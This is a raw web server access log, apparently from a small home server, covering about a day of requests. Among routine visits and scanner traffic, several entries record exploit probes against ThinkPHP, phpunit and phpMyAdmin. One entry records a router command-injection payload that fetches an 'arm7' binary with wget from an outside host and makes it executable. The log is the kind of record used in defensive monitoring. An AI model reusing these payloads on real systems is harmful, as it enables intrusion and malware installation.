Wed Jun 10 06:25:07 MDT 2020
 06:25:07 up 10 days, 11:33,  1 user,  load average: 0.36, 0.26, 0.27
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               30May20 10days  7:50   0.90s /usr/bin/lxsession -s LXDE-pi -e LXDE
5.188.206.50 - - [10/Jun/2020:13:16:22 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
195.54.160.135 - - [10/Jun/2020:15:10:17 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [10/Jun/2020:15:13:54 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [10/Jun/2020:15:14:00 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
178.93.47.91 - - [10/Jun/2020:15:14:24 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
103.120.174.37 - - [10/Jun/2020:15:18:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
89.40.182.58 - - [10/Jun/2020:15:20:32 +0000] "POST /link?url=pZWVm6ezMDQ0&enpl=OEhIJw==&encd=QSwsRzE= HTTP/1.1" 404 0 "" "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
195.54.160.135 - - [10/Jun/2020:15:22:47 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
61.219.11.153 - - [10/Jun/2020:15:35:22 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
122.117.17.154 - - [10/Jun/2020:15:42:31 +0000] "GET /setup.cgi HTTP/1.1" 400 0 "" ""
122.117.17.154 - - [10/Jun/2020:15:42:35 +0000] "GET /sess-bin/login_session.cgi HTTP/1.1" 400 0 "" ""
122.117.17.154 - - [10/Jun/2020:15:42:40 +0000] "GET /shell?/bin/busybox+ABCD HTTP/1.1" 400 0 "" "Abcd"
122.117.17.154 - - [10/Jun/2020:15:42:40 +0000] "GET / HTTP/1.1" 400 0 "" ""
122.117.17.154 - - [10/Jun/2020:15:42:44 +0000] "GET /sess-bin/login_session.cgi HTTP/1.1" 400 0 "" ""
122.117.17.154 - - [10/Jun/2020:15:42:56 +0000] "POST /doLogin HTTP/1.1" 404 0 "" "Abcd"
122.117.17.154 - - [10/Jun/2020:15:42:57 +0000] "GET /sess-bin/login_session.cgi HTTP/1.1" 400 0 "" ""
122.117.17.154 - - [10/Jun/2020:15:42:58 +0000] "GET / HTTP/1.1" 400 0 "" ""
122.117.17.154 - - [10/Jun/2020:15:43:02 +0000] "GET /sess-bin/login_session.cgi HTTP/1.1" 400 0 "" ""
122.117.17.154 - - [10/Jun/2020:15:43:07 +0000] "GET /shell?/bin/busybox+ABCD HTTP/1.1" 400 0 "" "Abcd"
45.92.126.74 - - [10/Jun/2020:15:52:00 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
45.92.126.74 - - [10/Jun/2020:15:52:00 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
14.102.47.230 - - [10/Jun/2020:16:38:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
107.174.244.100 - - [10/Jun/2020:16:49:06 +0000] "GET /muieblackcat HTTP/1.1" 404 0 "" ""
107.174.244.100 - - [10/Jun/2020:16:49:06 +0000] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 400 0 "" ""
107.174.244.100 - - [10/Jun/2020:16:49:06 +0000] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 400 0 "" ""
107.174.244.100 - - [10/Jun/2020:16:49:06 +0000] "GET //pma/scripts/setup.php HTTP/1.1" 400 0 "" ""
107.174.244.100 - - [10/Jun/2020:16:49:07 +0000] "GET //myadmin/scripts/setup.php HTTP/1.1" 400 0 "" ""
107.174.244.100 - - [10/Jun/2020:16:49:07 +0000] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 400 0 "" ""
107.174.244.100 - - [10/Jun/2020:16:49:07 +0000] "GET //PhpMyAdmin/scripts/setup.php HTTP/1.1" 400 0 "" ""
195.54.160.135 - - [10/Jun/2020:17:07:48 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
131.108.88.214 - - [10/Jun/2020:17:22:33 +0000] "GET / HTTP/1.1" 400 0 "" ""
45.148.10.72 - - [10/Jun/2020:18:59:41 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
172.105.89.161 - - [10/Jun/2020:20:26:55 +0000] "GET /0bef HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36"
45.166.33.140 - - [10/Jun/2020:20:35:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
194.61.26.34 - - [10/Jun/2020:20:48:22 +0000] "UNKNOWN  UNKNOWN" 408 0 "" ""
205.185.114.231 - - [10/Jun/2020:21:03:35 +0000] "GET / HTTP/1.1" 200 25000 "http://162.250.19.7:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
204.48.16.150 - - [10/Jun/2020:21:05:48 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
85.90.218.49 - - [10/Jun/2020:21:12:58 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
195.54.160.135 - - [10/Jun/2020:21:16:04 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.246.142.128 - - [10/Jun/2020:21:45:59 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
223.155.134.174 - - [10/Jun/2020:21:50:16 +0000] "POST /HNAP1/ HTTP/1.0" 404 0 "" ""
104.199.191.188 - - [10/Jun/2020:21:52:02 +0000] "GET /t HTTP/1.1" 404 0 "" "Go-http-client/1.1"
195.54.160.135 - - [10/Jun/2020:22:05:19 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
128.14.209.242 - - [10/Jun/2020:22:05:24 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 "
187.191.16.84 - - [10/Jun/2020:22:32:45 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
71.6.232.9 - - [10/Jun/2020:22:57:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
139.129.39.2 - - [10/Jun/2020:23:01:49 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
117.195.154.230 - - [10/Jun/2020:23:19:25 +0000] "GET / HTTP/1.1" 400 0 "" ""
42.115.114.52 - - [10/Jun/2020:23:25:14 +0000] "GET / HTTP/1.1" 400 0 "" ""
66.240.205.34 - - [10/Jun/2020:23:25:45 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
103.149.192.110 - - [11/Jun/2020:00:18:41 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
192.35.168.245 - - [11/Jun/2020:00:49:46 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
175.141.153.62 - - [11/Jun/2020:01:10:26 +0000] "GET / HTTP/1.1" 400 0 "" ""
185.95.186.2 - - [11/Jun/2020:01:10:36 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
83.97.20.21 - - [11/Jun/2020:01:47:16 +0000] "GET / HTTP/1.0" 200 25000 "" ""
195.54.160.135 - - [11/Jun/2020:02:07:07 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [11/Jun/2020:02:07:23 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [11/Jun/2020:02:07:26 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [11/Jun/2020:02:07:52 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [11/Jun/2020:02:13:54 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
170.233.137.90 - - [11/Jun/2020:02:14:25 +0000] "GET / HTTP/1.1" 400 0 "" ""
195.54.160.135 - - [11/Jun/2020:02:28:56 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [11/Jun/2020:02:31:37 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
91.231.40.246 - - [11/Jun/2020:03:25:27 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
162.243.143.206 - - [11/Jun/2020:05:37:45 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
42.115.12.64 - - [11/Jun/2020:05:43:47 +0000] "GET / HTTP/1.1" 400 0 "" ""
220.132.225.135 - - [11/Jun/2020:06:27:15 +0000] "GET / HTTP/1.1" 400 0 "" ""
175.136.32.31 - - [11/Jun/2020:06:33:46 +0000] "GET / HTTP/1.1" 400 0 "" ""
191.252.193.79 - - [11/Jun/2020:06:43:28 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
172.254.112.254 - - [11/Jun/2020:06:54:00 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
172.254.112.254 - - [11/Jun/2020:06:55:07 +0000] "UNKNOWN  UNKNOWN" 408 0 "" ""
185.107.80.34 - - [11/Jun/2020:07:31:13 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
180.150.52.157 - - [11/Jun/2020:07:42:54 +0000] "GET / HTTP/1.1" 400 0 "" ""
54.154.233.206 - - [11/Jun/2020:09:00:50 +0000] "GET / HTTP/1.1" 200 25000 "" "Apache-HttpClient/4.5.1 (Java/1.8.0_252)"
54.154.233.206 - - [11/Jun/2020:09:00:51 +0000] "GET / HTTP/1.1" 200 25000 "" "Java/1.8.0_252"
195.54.161.67 - - [11/Jun/2020:09:41:34 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
187.57.143.169 - - [11/Jun/2020:09:52:07 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
94.208.113.200 - - [11/Jun/2020:09:56:17 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
94.208.113.200 - - [11/Jun/2020:09:56:17 +0000] "GET / HTTP/1.1" 200 25000 "" ""
128.199.113.175 - - [11/Jun/2020:10:57:14 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
162.250.19.7 - - [11/Jun/2020:12:05:39 +0000] "GET / HTTP/1.1" 200 25000 "http://162.250.19.7/music/" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0"
162.250.19.7 - - [11/Jun/2020:12:05:51 +0000] "GET / HTTP/1.1" 200 25000 "http://162.250.19.7/music/" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0"
162.250.19.7 - - [11/Jun/2020:12:06:02 +0000] "GET /pictures/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0"
162.250.19.7 - - [11/Jun/2020:12:06:19 +0000] "GET /pictures/StMichaelTheArchangelMission/ HTTP/1.1" 200 25000 "http://162.250.19.7/pictures/" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0"
162.250.19.7 - - [11/Jun/2020:12:06:22 +0000] "GET /pictures/StMichaelTheArchangelMission/2020-02-25/ HTTP/1.1" 200 25000 "http://162.250.19.7/pictures/StMichaelTheArchangelMission/" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0"
162.250.19.7 - - [11/Jun/2020:12:06:26 +0000] "GET /pictures/StMichaelTheArchangelMission/2020-02-25/SANY0981.JPG HTTP/1.1" 200 867920 "http://162.250.19.7/pictures/StMichaelTheArchangelMission/2020-02-25/" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0"
162.250.19.7 - - [11/Jun/2020:12:06:39 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
162.250.19.7 - - [11/Jun/2020:12:06:45 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
162.250.19.7 - - [11/Jun/2020:12:06:54 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
Thu Jun 11 06:25:07 MDT 2020
 06:25:08 up 21 min,  1 user,  load average: 0.40, 0.34, 0.41
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               05:29    1:08m  1.22s  0.18s /usr/bin/lxsession -s LXDE-pi -e LXDE